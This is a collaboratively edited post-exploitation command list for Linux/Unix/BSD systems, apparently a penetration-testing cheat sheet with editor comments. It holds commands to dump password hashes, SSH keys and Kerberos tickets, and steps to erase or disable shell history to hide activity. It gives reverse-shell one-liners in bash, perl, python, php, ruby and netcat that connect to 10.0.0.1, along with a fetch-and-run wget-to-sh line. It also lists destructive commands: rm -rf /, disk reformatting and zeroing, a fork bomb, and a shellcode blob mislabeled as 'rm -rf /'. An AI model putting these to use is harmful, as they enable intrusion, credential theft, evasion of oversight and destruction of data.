Linux/Unix/BSD Post-Exploitation

Command List

If for any reason you cannot access/edit these files in the future, please contact

mubix@hak5.org

You can download these files in any format using Google   Doc’s

File->Download As method

If you are viewing this on anything other than Google Docs, you can get

access to the latest links to the Linux/Unix/BSD, OS X, Obscure, Metasploit, and

Windows docs here: http://bit.ly/nuc0N0

DISCLAIMER: Anyone can edit these docs, and all that entails and implies

Table of Contents

Table of Contents

Information

Blind Files

System

Networking

User accounts

Credentials

Configs

Determine Distro

Installed Packages

Package Sources

Finding Important Files

Covering Your Tracks

Avoiding history filesmys

Obtain users’ information

Escalating

Looking for possible opened paths

Maintaining control

Reverse Shell

Fun if Windows is present and accessible

Stuff to be sorted

Deleting and Destroying

Execute a remote script

Fork Bomb

Information

Blind Files

(things to pull when all you can do is blindly read) LFI/dir traversal (Don’t forget %00!)

File

Contents and Reason

/etc/resolv.conf

 

Contains the current name servers (DNS) for the system. This is a globally readable file that is less likely to trigger IDS alerts than /etc/passwd

/etc/motd

Message of the Day.

/etc/issue

Debian - current version of distro

/etc/passwd

List of local users

/etc/shadow

List of users’ passwords’ hashes (requires root)

/home/xxx/.bash_history

Will give you some directory context

System

Command        

Description and/or Reason

uname -a        

Prints the kernel version, arch, sometimes distro, ...        

ps aux

List all running processes

top -n 1 -d

Print process, 1 is a number of lines

id

Your current username, groups

arch, uname -m

Kernel processor architecture                

w

who is connected, uptime and load avg

who -a

uptime, runlevel, tty, proceses etc.                

gcc -v

Returns the version of GCC.

mysql --version

Returns the version of MySQL.

perl -v

Returns the version of Perl.

ruby -v

Returns the version of Ruby.

python --version                

Returns the version of Python.

df -k

mounted fs, size, % use, dev and mount point[

mount

mounted fs                

last -a

Last users logged on

lastcomm

                

lastlog        

                

lastlogin (BSD)

                

getenforce

Get the status of SELinux (Enforcing, Permissive or Disabled)

dmesg        

Informations from the last system boot

lspci

prints all PCI buses and devices

lsusb

prints all USB buses and devices/h

lscpu

prints CPU information

lshw

ex

cat /proc/cpuinfo

                

cat /proc/meminfo

du -h --max-depth=1 /

(note: can cause heavy disk i/o)

which nmap

locate a command (ie nmap or nc)

locate bin/nmap

locate bin/nc

jps -l

java -version

Returns the version of Java.

Networking

  1. hostname -f
  2. ip addr show
  3. ip ro show
  4. ifconfig -a
  5. route -n
  6. cat /etc/network/interfaces
  7. iptables -L -n -v
  8. iptables -t nat -L -n -v
  9. ip6tables -L -n -v
  10. iptables-save
  11. netstat -anop
  12. netstat -r
  13. netstat -nltupw (root with raw sockets)
  14. arp -a
  15. lsof -nPi

to resume it → “cat /proc/net/*” (more discreet)

what does the above mean? -> It means that all the information given by the above commands can be found by looking into the files under /proc/net , and that this approach is less likely to trigger monitoring or other stuff.

User accounts

  1. local accounts: cat /etc/passwd
  1. password hashes in /etc/shadow on Linux
  2. password hashes in /etc/security/passwd on AIX
  3. groups in /etc/group (and/or /etc/gshadow on Linux)
  1. all accounts: getent passwd
  1. should dump local, LDAP, NIS, whatever the system is using
  2. same with getent group
  1. Samba’s own database: pdbedit -L -w or pdbedit -L -v
  2. privileged accounts: cat         
  1. (above: cat ???)
  1. mail aliases: cat /etc/aliases find /etc -name aliases, getent aliases
  2. NIS accounts: ypcat passwd - displays NIS password file

Credentials

  1. SSH keys, often passwordless: /home/*/.ssh/id*
  2. SSH agent:
  4. Kerberos tickets: /tmp/krb5cc_*, /tmp/krb5.keytab
  5. PGP keys: /home/*/.gnupg/secring.gpgs

Configs

  1. ls -aRl /etc/ | awk '$1 ~ /w.$/' | grep -v lrwx 2>/dev/nullte        
  2. cat /etc/issue{,.net}
  3. cat /etc/master.passwd
  4. cat /etc/group
  5. cat /etc/hosts
  6. cat /etc/crontab
  7. cat /etc/sysctl.conf
  8. for user in $(cut -f1 -d: /etc/passwd); do echo $user; crontab -u $user -l; done # (Lists all crons)
  9. cat /etc/resolv.conf
  10. cat /etc/syslog.conf
  11. cat /etc/chttp.conf
  12. cat /etc/lighttpd.conf
  13. cat /etc/cups/cupsd.confcda
  14. cat /etc/inetd.conf        
  15. cat /opt/lampp/etc/httpd.conf
  16. cat /etc/samba/smb.conf
  17. cat /etc/openldap/ldap.conf
  18. cat /etc/ldap/ldap.conf
  19. cat /etc/exports
  20. cat /etc/auto.master
  21. cat /etc/auto_master
  22. cat /etc/fstab
  23. find /etc/sysconfig/ -type f -exec cat {} \;

Determine Distro

  1. lsb_release -d                                                # Generic command for all LSB distros
  2. /etc/os-release                                        # Generic for distros using “systemd”
  3. /etc/issue                                                # Generic but often modified
  4. cat /etc/*release
  5. /etc/SUSE-release                                         # Novell SUSE                 
  6. /etc/redhat-release, /etc/redhat_version                 # Red Hat
  7. /etc/fedora-release                                         # Fedora
  8. /etc/slackware-release, /etc/slackware-version         # Slackware
  9. /etc/debian_release, /etc/debian_version                # Debian
  10. /etc/mandrake-release                                 # Mandrake
  11. /etc/sun-release                                         # Sun JDS
  12. /etc/release                                                # Solaris/Sparc
  13. /etc/gentoo-release                                         # Gentoo
  14. /etc/arch-release                                        # Arch Linux (file will be empty)
  15. arch                                                        # OpenBSD; sample: “OpenBSD.amd64”
  16. uname -a                                                # often hints at it pretty well

Installed Packages

  1. rpm -qa --last | head
  2. yum list | grep installed
  3. Debian:                dpkg -l

dpkg -l | grep -i “linux-image”

dpkg --get-selections

  1. {Free,Net}BSD:        pkg_info
  2. Solaris:                pkginfo
  3. Gentoo:                                 # equery must be installed

cd /var/db/pkg/ && ls -d */*        # always works

  1. Arch Linux:                pacman -Q

Package Sources

  1. cat /etc/apt/sources.list
  1. ls -l /etc/yum.repos.d/
  2. cat /etc/yum.conf

Finding Important Files

  1. ls -dlR */ #
  2. ls -alR | grep ^d
  3. find /var -type d
  4. ls -dl `find /var -type d`
  5. ls -dl `find /var -type d` | grep -v root
  6. find /var ! -user root -type d -ls
  7. find /var/log -type f -exec ls -la {} \;
  8. find / -perm -4000 (find all suid files)
  9. ls -alhtr /mnt
  10. ls -alhtr /media
  11. ls -alhtr /tmp
  12. ls -alhtr /home
  13. cd /home/; treels /home/*/.ssh/*
  14. find /home -type f -iname '.*history'
  15. ls -lart /etc/rc.d/
  16. locate tar | grep [.]tar$  # Remember to updatedb before running locate
  17. locate tgz | grep [.]tgz$
  18. locate sql | grep [.]sql$
  19. locate settings | grep [.]php$  
  20. locate config.inc | grep [.]php$
  1. ls /home/*/id*
  2.  .properties | grep [.]properties # java config files
  3. locate .xml | grep [.]xml # java/.net config files
  4. find /sbin /usr/sbin /opt /lib `echo $PATH | ‘sed s/:/ /g’` -perm /6000  -ls # find suids
  5. locate rhosts

Covering Your Tracks

Avoiding history filesmys

  1. export HISTFILE=

or

  1. unset HISTFILE

This next one might not be a good idea, because a lot of folks know to check for tampering with this file, and will be suspicious if they find out:        

However if you happen to be on an account that was originally inaccessible, if the .bash_history file is available (ls -a ~), viewcating its contents can provide you with a good deal of information about the system and its most recent updates/changes.  

clear all history in ram

  1. history -c
  2. rm -rf ~/.bash_history && ln -s ~/.bash_history /dev/null (invasive)
  1. touch ~/.bash_history (invasive)
  2. <space> history -c (using a space before a command)        
  3. zsh% unset HISTFILE HISTSIZE        
  4. tcsh% set history=0        
  5. bash$ set +o history
  6. ksh$ unset HISTFILE
  7. find / -type f -exec {} (forensics nightmare)

Note that you’re probably better off modifying or temporary disabling rather than deleting history files, it leaves a lot less traces and is less suspect.

In some cases HISTFILE and HISTFILESIZE are made read-only; get around this by explicitly clearing history (history -c) or by kill -9 $$’ing the shell. Sometimes the shell can be configured to run ‘history -w’ after every command; get around this by overriding ‘history’ with a no-op shell function. None of this will help if the shell is configured to log everything to syslog, however.

Obtain users’ information

  1. ls -alh /home/*/        
  2. ls -alh /home/*/.ssh/
  3. cat /home/*/.ssh/authorized_keys
  4. cat /home/*/.ssh/known_hosts
  5. cat /home/*/.*hist* # you can learn a lot from this
  6. find /home/*/.vnc /home/*/.subversion -type f
  7. grep ^ssh /home/*/.*hist*
  8. grep ^telnet `/home/*/.*hist*
  9. grep ^mysql /home/*/.*hist*
  10. cat /home/*/.viminfo
  1. sudo -l # if sudoers is not. readable, this sometimes works per user
  2. crontab -l
  3. cat /home/*/.mysql_history

Escalating

Looking for possible opened paths

  1. ls -alh /root/
  2. sudo -l
  3. cat /etc/sudoers
  4. cat /etc/shadow
  5. cat /etc/master.passwd # OpenBSD
  6. cat /var/spool/cron/crontabs/* | cat /var/spool/cron/*
  7. lsof -nPi
  8. ls /home/*/.ssh/*

Maintaining control

Reverse Shell

Starting list sourced from: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

  1. bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 (No /dev/tcp on older Debians, but use nc, socat, TCL, awk or any interpreter like Python, and so on.).
  2. perl -e 'use Socket; $i="10.0.0.1"; $p=1234; socket(S,PF_INET, SOCK_STREAM, getprotobyname("tcp")); if(connect(S,sockaddr_in($p,inet_aton($i)))){ open(STDIN,">&S"); open(STDOUT,">&S"); open(STDERR,">&S"); exec("/bin/sh -i");};'
  3. python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect(("10.0.0.1",1234)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'
  4. php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
  5. ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i; exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' nc -e /bin/sh 10.0.0.1 1234 # note need -l on some versions, and many does NOT support -e anymore
  6. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
  7. xterm -display 10.0.0.1:1se        
  1. Listener- Xnest :1
  2. Add permission to connect- xhost +victimIP
  1. ssh -NR 3333:localhost:22 user@yourhost
  2. nc -e /bin/sh 10.0.0.1 1234

Fun if Windows is present and accessible

If there is Windows installed and the logged-in user access level includes those Windows partition, attacker can mount them up and do a much deeper information gathering, credential theft and root-ing. Ntfs-3g is useful for mounting ntfs partitions read-write.

TODO: insert details on what to look for

Stuff to be sorted

## GOING TO MOVE EVERYTHING HERE FOR LEGIBILITY ONCE EDITING DIES DOWN

Command        

Output

ps aux                

List of running processes

id

List current user and group along with user/group id                

w

Show info about who is logged, what are they are doing                

who -a

Print information about users                

cat /dev/core > /dev/audio

cat /dev/mem > /dev/audio

Makes a sound from the memory content.

Usefulness of this??? (none, aside from pissing off the sysadmin, in the very unlikely case that the server has speakers and the legacy OSS driver)

sudo -p

allows the user to define what the password prompt will be

(useful for fun customization with aliases or shell scripts)

Deleting and Destroying

(If it is necessary to leave the machine inaccessible or unusable)

Note that this tends to be quite evident (as opposed to a simple exploitation that might go unnoticed for some time, even forever), and will most surely get you into troubles.

Oh, and you’re probably a jerk if you use any of the stuff below.

Command

Description

rm -rf /

This will recursively try to delete all files.

char esp[] __attribute__ ((section(”.text”))) /* e.s.p release */ = “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″

“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″

“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″

“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″

“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″

“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″

“\x6e\x2f\x73\x68\x00\x2d\x63\x00″

“cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;”;        

Hex version of rm -rf /        

How is this supposed to work?

mkfs.ext3 /dev/sda

Reformat the device mentioned, making recovery of files hard.                

dd if=/dev/zero of=/dev/sda bs=1M

Overwrite disk /dev/sda with zeros

Execute a remote script

wget http://server/file.sh -O- | sh

This command forces the download of a file and immediately its execution, can be exploited easily using or reverse shit                

Fork Bomb

:(){:|:&};:

The [in]famous "fork bomb". This command will cause your system to run a large number of processes, until it "hangs". This can often lead to data loss (e.g. if the user brutally reboots, or the OOM killer kills a process with unsaved work). If left alone for enough time a system can eventually recover from a fork bomb.

[a]

[b]

[c]

[d]

Linux/Unix/BSD Post Exploitation Command List - Page:

[a]Benito Camelo:

Just for Fun  - "apt-get install sl" (Distro debian based) then to any command create an alias of sl

[b]Sherwyn Williams:

Awesome list mubix I will review and try to add some stuff once the action dies down.

Rob Fuller:

Sweet!!

[c]Jay Taylor:

Is there a place for commands to issue as root vs. non-privileged user?

Rob Fuller:

Sort of, but you are welcome to make one / make it look better

[d]vavarachen:

How about adding ~/.mysql_history to the list?  Lot of juicy info in there, and sometimes even passwords in clear text.

Rob Fuller:

Awesome, add it!